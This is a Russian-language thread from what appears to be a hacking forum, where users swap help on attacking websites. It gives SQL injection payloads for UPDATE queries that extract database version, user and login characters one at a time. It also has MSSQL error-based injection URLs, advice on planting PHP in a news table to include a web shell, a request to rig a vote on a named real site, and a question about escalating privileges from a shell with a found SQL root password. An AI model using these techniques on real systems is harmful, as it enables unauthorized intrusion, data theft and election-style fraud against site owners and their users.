Ваши вопросы по уязвимостям.

Вроде это сведетельствует о том, что magic_quotes_gpc используется вместе с addslashes, т.к. после экранирования кавычки мэджиками, идет экранирование слеша (я могу ошибаться)...

Подставь другой текст, ass так же?

Ну мб вывод ошибки типа

PHP:

...
echo '{"error":"'.mysql_error().'"}';
...

 

А может это не селект а update запрос?
Судя по названия переменной адд
А может инсерт вовсе...

 

ну если он UPDATE то union select не прокатит!
с помощью юнион можно только объединить два SELECT запроса.

по идеи там запрос типа
UPDATE blabla SET bla_par={$_POST['add']} bla..... WHERE bla......
Поюзать ты сможешь если: сможешь потом получится посмотреть то что проапдейтил!

Не плохо было б знать какие еще это запрос изменяет поля.А вообще подзапросы в помощь.

пример

UPDATE blabla SET bla_par=(SELECT version()) WHERE tratata....-- bla..... WHERE bla......
или ты к примеру знаешь что этот же запрос апдейтит текстовое поле name
UPDATE blabla SET bla_par=1, name=(SELECT concat_ws(0x3a,version(),database(),user()) WHERE tratata -- bla..... WHERE bla......
лучше конечно взглянуть бы в сорцы если это возможно что б иметь представление о структуре запроса

извените если сказал бред (=

АПД: или юзай more than 1 rows https://forum.antichat.ru/threadnav35207-1-10.html
АПД2:
UPDATE table SET add=(SELECT ASCII( substring( (SELECT login FROM users WHERE id=1 ),3,1) )) WHERE id=1

вот пример запроса с инъекцией(жирным наш код)
перебираем по одному символы. Это конечно если можно глянуть результат апдейта.

 

и часто ты такое видел?..чтобы знач не в кавычках шло?..не считая int..?

 

судя по этому инт!

 

довольно часто бывает без ковычек

 

Вообще если даже html отбрасывает, то наверно нет.
В бд есть таблица с новостями, там то точно фильтра нету, сделай прям в таблице PHP скрипт.
Ну а вообще некто не отменял проверять

PHP:

<?PHP
echo "Proverka antichat";
?>


Потом заходишь в новость, CTRL+F, Proverka antichat.
Если найдено -> include('твой шелл');
Если ненайдено -> облом, ищи другую дыру.

 

тогда вставляй туда уже любой свой хтмл/жаваскрипт код только шеллом это тебе не светит...

 

В таблице - в базе данных.
Просто перед заносом данных в таблицу новостей.
Идёт фильтр написанный на PHP.
А так если вручную вписать то выполниться.

 

В вышеприведенном скрипте - нет.
HTML не имеет доступа к файловой системе.

 

Фильтрует именно ">? Или " и > по очереди?

 

Limit, потом может быть addslashes.

 

На ключ?

DeluxeS
https://forum.antichat.ru/thread104591.html
Вопрос №3

 

site.com/request_list.asp?action=view&id=111814+and+1=(select+@@version
но при

site.com/request_list.asp?action=view&id=111814+or+1=(select+top+1+table_name+from+information_schema.tables)--
ругается а-ля

Incorrect syntax near the keyword 'from'.


при union select верном пишет Incorrect syntax near '@@version'.


перегуглил все интернеты, нигде не нашел вразумительного ответа, обходы /**/, %20 и прочее не пашет, подскажите а?

 

Ты для union select кол-во колонок подбирал?

 

1' or 1=@@version
или
1 or 1=@@version

http://injection.rulezz.ru/MSSQL-Injection.html
На почитай.

 

Добрый день!У меня вопрос по голосованию на этом сайте http://www.pervouralsk.ru/partyzanky/
Голосание проходит,один логин один голос.Но у некоторых уже почти 1000,как это можно реализовать????я регистрировал сам акки,но это очень долго и муторно.ПОдскажи как можно???если возможно то накрутите за Салацкую Марию!

 

есть шелл на сайте, в конфигах нашол пасс от sql рута.
Как через sql рута поднять права на шелле?

 

SQL Root - Это SQL Root, но не линуксовый.
С его помощью права на серваке не поднимешь (только в SQL).